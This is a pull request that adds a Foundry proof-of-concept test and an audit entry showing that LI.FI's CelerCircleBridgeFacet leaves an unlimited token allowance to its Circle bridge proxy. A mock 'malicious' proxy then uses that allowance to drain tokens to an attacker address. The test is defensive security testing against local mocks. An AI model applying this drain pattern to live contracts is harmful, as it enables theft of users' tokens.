### PR TITLE
test: add CelerCircleBridgeFacet allowance exploit

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -390,3 +390,7 @@
 - Severity: High
 - Test: `forge test --match-path test/solidity/Security/GnosisBridgeFacetAllowance.t.sol`
 - Result: `startBridgeTokensViaGnosisBridge` leaves an unlimited allowance to the Gnosis bridge router, enabling token drain via `transferFrom` if the router is compromised.
+## CelerCircleBridgeFacet unlimited token allowance to proxy
+- Severity: High
+- Test: `forge test --match-path test/solidity/Security/CelerCircleBridgeFacetAllowance.t.sol`
+- Result: `_startBridge` grants unlimited approval to `circleBridgeProxy`, allowing a compromised proxy to drain tokens sent to the facet.

--- a/test/solidity/Security/CelerCircleBridgeFacetAllowance.t.sol
+++ b/test/solidity/Security/CelerCircleBridgeFacetAllowance.t.sol
@@ -1,0 +1,75 @@
+// SPDX-License-Identifier: Unlicense
+pragma solidity ^0.8.17;
+
+import {Test} from "forge-std/Test.sol";
+import {MockERC20} from "solmate/test/utils/mocks/MockERC20.sol";
+import {CelerCircleBridgeFacet} from "lifi/Facets/CelerCircleBridgeFacet.sol";
+import {ICircleBridgeProxy} from "lifi/Interfaces/ICircleBridgeProxy.sol";
+import {ILiFi} from "lifi/Interfaces/ILiFi.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+
+contract MockCircleBridgeProxy is ICircleBridgeProxy {
+    address public token;
+
+    constructor(address _token) {
+        token = _token;
+    }
+
+    function depositForBurn(
+        uint256 _amount,
+        uint64,
+        bytes32,
+        address _burnToken
+    ) external override returns (uint64) {
+        IERC20(_burnToken).transferFrom(msg.sender, address(this), _amount);
+        return 0;
+    }
+
+    // malicious function to drain tokens using remaining allowance
+    function drain(address from, address to, uint256 amount) external {
+        IERC20(token).transferFrom(from, to, amount);
+    }
+}
+
+contract CelerCircleBridgeFacetAllowanceTest is Test {
+    MockERC20 internal token;
+    MockCircleBridgeProxy internal proxy;
+    CelerCircleBridgeFacet internal facet;
+    address internal attacker = address(0xbeef);
+
+    function setUp() public {
+        token = new MockERC20("Mock", "MOCK", 18);
+        proxy = new MockCircleBridgeProxy(address(token));
+        facet = new CelerCircleBridgeFacet(ICircleBridgeProxy(address(proxy)), address(token));
+
+        token.mint(address(this), 100 ether);
+        token.approve(address(facet), type(uint256).max);
+    }
+
+    function test_UnlimitedAllowanceAllowsTokenDrain() public {
+        ILiFi.BridgeData memory bridgeData = ILiFi.BridgeData({
+            transactionId: bytes32("tx"),
+            bridge: "",
+            integrator: "",
+            referrer: address(0),
+            sendingAssetId: address(token),
+            receiver: address(0x1234),
+            minAmount: 10 ether,
+            destinationChainId: 1,
+            hasSourceSwaps: false,
+            hasDestinationCall: false
+        });
+
+        facet.startBridgeTokensViaCelerCircleBridge(bridgeData);
+
+        // allowance remains set after bridging
+        assertEq(token.allowance(address(facet), address(proxy)), type(uint256).max);
+
+        // attacker sends tokens to facet and proxy drains them
+        token.mint(address(facet), 5 ether);
+        proxy.drain(address(facet), attacker, 5 ether);
+
+        assertEq(token.balanceOf(attacker), 5 ether);
+    }
+}
+


### PR DESCRIPTION
## Summary
- add regression test for unlimited allowance in CelerCircleBridgeFacet
- document attack vector in TestedVectors

## Testing
- `forge test --match-path test/solidity/Security/CelerCircleBridgeFacetAllowance.t.sol -v`


------
https://chatgpt.com/codex/tasks/task_e_68ace782df04832d9c731b75d735d7c4